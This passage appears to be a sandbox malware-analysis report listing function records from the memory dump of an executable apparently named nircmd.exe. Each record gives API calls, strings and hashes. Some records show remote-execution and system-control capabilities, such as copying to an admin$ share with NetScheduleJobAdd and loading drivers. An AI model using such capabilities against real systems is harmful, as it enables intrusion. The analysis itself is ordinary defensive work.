                                                      • Instruction ID: 668a005e2f39fca5e31490e88c77fe857c3ba33e66915e27bdd9f571ef9f2703
                                                      • Opcode Fuzzy Hash: 2bd1bbcd66995d93a670adfe874cbc0423678e83b78ef91b29bc97a9acfa463d
                                                      • Instruction Fuzzy Hash: D751B8B190C20999EF14EAA19945BDEB7BC9F50315F2004ABF641F20C1EBFC9BC59A1D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi
                                                      • String ID: appdata$common_favorites$common_programfiles$common_programs$common_start_menu$common_startup$cookies$desktop$favorites$mydocuments$programfiles$programs$recent$start_menu$startup
                                                      • API String ID: 1439213657-4204506731
                                                      • Opcode ID: 62900bb2b291047e5e744b34b4bb0bd742fee2e8bde05b1e9e46d9be80575ec0
                                                      • Instruction ID: 84e747d3d89de970baa2b6eef6acbe2433b51fdacb2645c609412d554c0104a0
                                                      • Opcode Fuzzy Hash: 62900bb2b291047e5e744b34b4bb0bd742fee2e8bde05b1e9e46d9be80575ec0
                                                      • Instruction Fuzzy Hash: 8F31107138D71568F928A1622E17BDB42888F91719F31002BFB06F81CBFEDD95E2505E
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wcsicmp$wcscpy$memsetwcsrchr
                                                      • String ID: .bmp$.gif$.jpeg$.jpg$.tif$.tiff$image/bmp$image/gif$image/jpeg$image/png$image/tiff
                                                      • API String ID: 4077561463-929284103
                                                      • Opcode ID: e8fe433eef520ae3c433b2bc46bc108fbfc1c028796db5794f1d776e585c9bbb
                                                      • Instruction ID: 18573b68ab7b8405bab2980dc367c91d58b0042c65243e02ac7ac69308cb81a4
                                                      • Opcode Fuzzy Hash: e8fe433eef520ae3c433b2bc46bc108fbfc1c028796db5794f1d776e585c9bbb
                                                      • Instruction Fuzzy Hash: F721517255831529FA24A561EE57FEF23A89F40724F2000AFF904E60D3EEFCAAD1459C
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(GDIPlus.dll,?,00401C5D), ref: 00401BBB
                                                      • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 00401BD7
                                                      • GetProcAddress.KERNEL32(?,GdiplusShutdown), ref: 00401BE3
                                                      • GetProcAddress.KERNEL32(?,GdipSaveImageToFile), ref: 00401BEF
                                                      • GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00401BFB
                                                      • GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00401C07
                                                      • GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00401C13
                                                      • GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00401C1F
                                                      • GetProcAddress.KERNEL32(?,GdipLoadImageFromFile), ref: 00401C2B
                                                      • GetProcAddress.KERNEL32(?,GdipCreateHBITMAPFromBitmap), ref: 00401C37
                                                      • GetProcAddress.KERNEL32(?,GdipCreateBitmapFromFile), ref: 00401C43
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: GDIPlus.dll$GdipCreateBitmapFromFile$GdipCreateBitmapFromHBITMAP$GdipCreateHBITMAPFromBitmap$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipLoadImageFromFile$GdipSaveImageToFile$GdiplusShutdown$GdiplusStartup
                                                      • API String ID: 2238633743-2224569043
                                                      • Opcode ID: 61b926afc11940b05dd29d826a64e68c5647ae897ed916439a6a2eb5db193e78
                                                      • Instruction ID: 0500e0c1d9706a3f21694b56e68380e9cd14f07ce3511409d06935751650487d
                                                      • Opcode Fuzzy Hash: 61b926afc11940b05dd29d826a64e68c5647ae897ed916439a6a2eb5db193e78
                                                      • Instruction Fuzzy Hash: 8311FE74A80744AACB31AF769D09D46BEF1EFE87003214D2EE2C5D3660D7BA9091DF48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memicmp$??2@??3@_mbscat_mbscpystrchrstrlen
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 1094824001-909552448
                                                      • Opcode ID: a8de2056a21eff082067b908bb00c76c7db1678acaa61244fb184de3d75fb3dd
                                                      • Instruction ID: a462732c724014110786ec3a09ead7eae17c50b36558f99cba83444e58c4fc68
                                                      • Opcode Fuzzy Hash: a8de2056a21eff082067b908bb00c76c7db1678acaa61244fb184de3d75fb3dd
                                                      • Instruction Fuzzy Hash: 6C21B8B265830575E62136239D03FEB25888F55718F21083BFA05B11C3FABDD6E2519E
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,?,0040BFEF,?,?,Failed to load the process library !), ref: 0040D80F
                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040D826
                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040D838
                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040D84A
                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040D85C
                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040D86E
                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 0040D880
                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040D892
                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040D8A4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                      • API String ID: 667068680-2887671607
                                                      • Opcode ID: 88edd74978eebbde6a8b54eb6a302f0338cb48207eed49e69b5553b91389eee7
                                                      • Instruction ID: 97e52fd98595b8367a39f4ffdcb843984cb43f9aa7f1a70d038ffbf428850fc4
                                                      • Opcode Fuzzy Hash: 88edd74978eebbde6a8b54eb6a302f0338cb48207eed49e69b5553b91389eee7
                                                      • Instruction Fuzzy Hash: B4013274E42364AACB11EFB1BC49ACA3E71E704765B23853BE40462270D679D5D4DE4C
                                                      APIs
                                                      • memset.MSVCRT ref: 00404539
                                                      • memset.MSVCRT ref: 0040454E
                                                      • memset.MSVCRT ref: 00404563
                                                      • memset.MSVCRT ref: 0040457D
                                                      • memset.MSVCRT ref: 00404596
                                                      • memset.MSVCRT ref: 004045AB
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004045DE
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004045FD
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040461C
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000FFF), ref: 0040463F
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040464F
                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 00404661
                                                      • GetLastError.KERNEL32 ref: 00404689
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00404699
                                                      • GetLastError.KERNEL32 ref: 004046A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memset$ByteCharMultiWide$ErrorLastLibrary$AddressFreeLoadProc
                                                      • String ID: CreateProcessWithLogonW$advapi32.dll
                                                      • API String ID: 969872975-2238408776
                                                      • Opcode ID: c8e85411d734271b515c21c643e7b85feab6c8f72f4788a19d13a785dfd467ee
                                                      • Instruction ID: 9b7d86e6ffba30b3c5eb017853c87504cc71b726d5a995e6fbb3f6575b1d0632
                                                      • Opcode Fuzzy Hash: c8e85411d734271b515c21c643e7b85feab6c8f72f4788a19d13a785dfd467ee
                                                      • Instruction Fuzzy Hash: F841A1B180112CBACB219F85CC449DFBBBCEF49350F1046A6F619A2250D3B54BD0CFA9
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi
                                                      • String ID: aux$headphones$line$master$microphone$phone$synth$wavein$waveout
                                                      • API String ID: 1439213657-1911086473
                                                      • Opcode ID: c9b3d0e6ef2a7369ebca0c6a69ee07f272b32f128b7fdf2b743ef42b5b2d1902
                                                      • Instruction ID: 7df1aee929c7ba9d71f8332c97ec416d7870386ef3be4270d71cab4c33990498
                                                      • Opcode Fuzzy Hash: c9b3d0e6ef2a7369ebca0c6a69ee07f272b32f128b7fdf2b743ef42b5b2d1902
                                                      • Instruction Fuzzy Hash: 08110DB234E61429F929A1562E13BCB42898FD176BFB0406BFA00E41C6FFDD99D1915C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memset$ByteCharMultiWide$CopyFile_mbscat_mbscpysprintf
                                                      • String ID: NetApiBufferFree$NetRemoteTOD$NetScheduleJobAdd$admin$\nircmd.exe$nircmd.exe %s
                                                      • API String ID: 505568804-2025064379
                                                      • Opcode ID: 43a6bd01bb938118b0041c331df085d8b9c6e458efa7d1ada0e49307fe9760bf
                                                      • Instruction ID: 6640c16d173142ed877ab8e24523ce1320164c62880729fad12619cfa39506a5
                                                      • Opcode Fuzzy Hash: 43a6bd01bb938118b0041c331df085d8b9c6e458efa7d1ada0e49307fe9760bf
                                                      • Instruction Fuzzy Hash: 67516E72900218AEDB24EB65CD81DDA77ACAF19344F1044BFF109E7191DA78DB888F68
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,0040E6E4,?,00405B0C,?,00000000,?), ref: 0040E666
                                                      • LoadLibraryA.KERNEL32(rasapi32.dll,0040E6E4,?,00405B0C,?,00000000,?), ref: 0040E674
                                                      • GetProcAddress.KERNEL32(00000000,RasSetEntryDialParamsA), ref: 0040E68D
                                                      • GetProcAddress.KERNEL32(?,RasEnumConnectionsA), ref: 0040E699
                                                      • GetProcAddress.KERNEL32(?,RasGetConnectStatusA), ref: 0040E6A5
                                                      • GetProcAddress.KERNEL32(?,RasHangUpA), ref: 0040E6B1
                                                      • GetProcAddress.KERNEL32(?,RasGetEntryDialParamsA), ref: 0040E6BD
                                                      • GetProcAddress.KERNEL32(?,RasDialA), ref: 0040E6C9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$Library$FreeLoad
                                                      • String ID: RasDialA$RasEnumConnectionsA$RasGetConnectStatusA$RasGetEntryDialParamsA$RasHangUpA$RasSetEntryDialParamsA$rasapi32.dll
                                                      • API String ID: 2449869053-1206557285
                                                      • Opcode ID: 71aaf8e264078e9ae537e9612b3cbd77450f4deb84e043f1f82426b8833c9efd
                                                      • Instruction ID: 65e3c979efa681916e7576962b566444c402bdb742678064d88459515a261b7c
                                                      • Opcode Fuzzy Hash: 71aaf8e264078e9ae537e9612b3cbd77450f4deb84e043f1f82426b8833c9efd
                                                      • Instruction Fuzzy Hash: 2F019670A40741ABCB316FB69C09E46BEF5EF987017218C2EE2C1D36A0D7799190CE58
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00406D11
                                                      • memset.MSVCRT ref: 00406D3F
                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 00406D52
                                                      • strcmp.MSVCRT ref: 00406D64
                                                        • Part of subcall function 00405A62: _strcmpi.MSVCRT ref: 00405A6E
                                                        • Part of subcall function 004028F0: _strcmpi.MSVCRT ref: 004028F6
                                                      • memset.MSVCRT ref: 00406D97
                                                      • GetWindowTextA.USER32(?,?,000003FF), ref: 00406DAA
                                                      • memset.MSVCRT ref: 00406DF5
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00406E04
                                                      • GetDlgItem.USER32(?,00000000), ref: 00406E60
                                                      • GetDlgItem.USER32(?,00000000), ref: 00406E97
                                                      • SendMessageA.USER32(00000000,0000000C,00000000,?), ref: 00406EAB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Windowmemset$Item_strcmpi$ClassMessageNameProcessSendTextThreadVisiblestrcmp
                                                      • String ID: #32770$click$settext
                                                      • API String ID: 3158724904-3905513361
                                                      • Opcode ID: 9785ac1e430260d5d4f15da67f87f2c35c9e09eb3164c4ab4b482526dbfb543d
                                                      • Instruction ID: c98b9a54c935c2ae70c476c698d3e9d96ef63d6e7f5c2b5905e05dc1cf8f4857
                                                      • Opcode Fuzzy Hash: 9785ac1e430260d5d4f15da67f87f2c35c9e09eb3164c4ab4b482526dbfb543d
                                                      • Instruction Fuzzy Hash: A041E8B29001157FDB10AB24DC81ADBBB6CEF10304F154176FA59F62A2DB789E948FD8
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _mbscpy
                                                      • String ID: AppData$Common AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Cookies$Desktop$Favorites$Programs$Recent$Start Menu$Startup
                                                      • API String ID: 714388716-3872221218
                                                      • Opcode ID: 39e8b9259193fd68494e0f8eaaa6bd526b02396006d03aefd8de4e6d3ca13815
                                                      • Instruction ID: 04336655cea802fbc0651c6151d7ed60d8497528a5b63523210cc5d93020a277
                                                      • Opcode Fuzzy Hash: 39e8b9259193fd68494e0f8eaaa6bd526b02396006d03aefd8de4e6d3ca13815
                                                      • Instruction Fuzzy Hash: 0701AC722A8656F2D4340168FA06EB628419185BD57B806B77402BCDDCDDBC8ECF605F
                                                      APIs
                                                        • Part of subcall function 00402174: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004018B7,?), ref: 00402186
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00407F2E
                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00407F46
                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407F59
                                                      • GetLastError.KERNEL32 ref: 00407F82
                                                      • sprintf.MSVCRT ref: 00407FAA
                                                      • MessageBoxA.USER32(?,?,Error,00000030), ref: 00407FD1
                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00407FDA
                                                        • Part of subcall function 004022C8: memcpy.MSVCRT ref: 00402317
                                                      • CloseHandle.KERNEL32(?), ref: 00407FE3
                                                      • GetLastError.KERNEL32 ref: 00407FF1
                                                      • sprintf.MSVCRT ref: 00408019
                                                      • MessageBoxA.USER32(?,?,Error,00000030), ref: 0040803F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$ErrorLastMessagesprintf$??2@??3@CloseCreateHandleReadSizememcpy
                                                      • String ID: Error$Error %d: %s
                                                      • API String ID: 1131545048-1552265934
                                                      • Opcode ID: a2704f4704187353d4ee1d566cdf999123559d004b48586a0c9d3502838ebb84
                                                      • Instruction ID: 8206235b0e51beb1d0c25bb8055d523058538b48c07205db64ed49fc0719cbc8
                                                      • Opcode Fuzzy Hash: a2704f4704187353d4ee1d566cdf999123559d004b48586a0c9d3502838ebb84
                                                      • Instruction Fuzzy Hash: 423197B6804214ABDB109F64DC49EDA7BBCEB04350F1081B7FB04E6191DB789A84CB69
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0040DC56,0040659A), ref: 0040DB24
                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040DB3D
                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040DB4E
                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040DB5F
                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040DB70
                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040DB81
                                                      • FreeLibrary.KERNEL32(00000000,?,0040DC56,0040659A), ref: 0040DBA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$Library$FreeLoad
                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                      • API String ID: 2449869053-3953557276
                                                      • Opcode ID: 2dfeca48bb519ecfaf3585a1d8d739bc96133058e89086ca2f85793663d3707c
                                                      • Instruction ID: a9d4a894401f68dc3eb1d0b3637c4ef96432469f831c8ba14263845b0d00b76f
                                                      • Opcode Fuzzy Hash: 2dfeca48bb519ecfaf3585a1d8d739bc96133058e89086ca2f85793663d3707c
                                                      • Instruction Fuzzy Hash: 03014830E45345AAD7119F65AD40FEB7FB85745B41B134137E804F1299DB7CD445CA2C
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040DC4F,0040659A), ref: 0040DBBC
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040DBD5
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040DBE6
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040DBF7
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040DC08
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040DC19
                                                      • FreeLibrary.KERNEL32(00000000,?,0040DC4F,0040659A), ref: 0040DC39
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$Library$FreeLoad
                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                      • API String ID: 2449869053-232097475
                                                      • Opcode ID: 8d394d909052c0c6dc06b76a2046d9b5e037efd72e31190055624da345fc0950
                                                      • Instruction ID: 5fbac02b998787e6f1c694c415afe70afff8354c933033301084b361f9600769
                                                      • Opcode Fuzzy Hash: 8d394d909052c0c6dc06b76a2046d9b5e037efd72e31190055624da345fc0950
                                                      • Instruction Fuzzy Hash: 23014434E49209AAE7115F656F40BF73DBC9B49B41B11803BE804F2299DBBCC486CA2C
                                                      APIs
                                                        • Part of subcall function 0040D92C: GetCurrentProcess.KERNEL32(?,00000000,?), ref: 0040D935
                                                        • Part of subcall function 0040D92C: LoadLibraryA.KERNEL32(advapi32.dll,?,00000000,?), ref: 0040D944
                                                        • Part of subcall function 0040D92C: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0040D956
                                                        • Part of subcall function 0040D92C: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 0040D96C
                                                        • Part of subcall function 0040D92C: GetLastError.KERNEL32(?,00000000,?), ref: 0040D976
                                                        • Part of subcall function 0040E395: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E3B5
                                                        • Part of subcall function 0040E395: memset.MSVCRT ref: 0040E3CA
                                                        • Part of subcall function 0040E395: Process32First.KERNEL32(?,?), ref: 0040E3E6
                                                        • Part of subcall function 0040E395: Process32Next.KERNEL32(?,00000128), ref: 0040E537
                                                        • Part of subcall function 0040E395: CloseHandle.KERNEL32(?,?,00000128,?,00000000), ref: 0040E547
                                                      • memset.MSVCRT ref: 00406481
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000003FF), ref: 0040649C
                                                      • OpenProcess.KERNEL32(02000000,00000000), ref: 004064AC
                                                      • CloseHandle.KERNEL32(?,?,00000002,?,00000000,?), ref: 004064E6
                                                      • GetLastError.KERNEL32(00000000,?), ref: 004064E8
                                                      • CloseHandle.KERNEL32(00000000), ref: 004064F7
                                                      • memset.MSVCRT ref: 00406505
                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 00406539
                                                      • CloseHandle.KERNEL32(?), ref: 0040654A
                                                      • FreeLibrary.KERNEL32(?), ref: 00406554
                                                      • FreeLibrary.KERNEL32(?,?), ref: 00406562
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
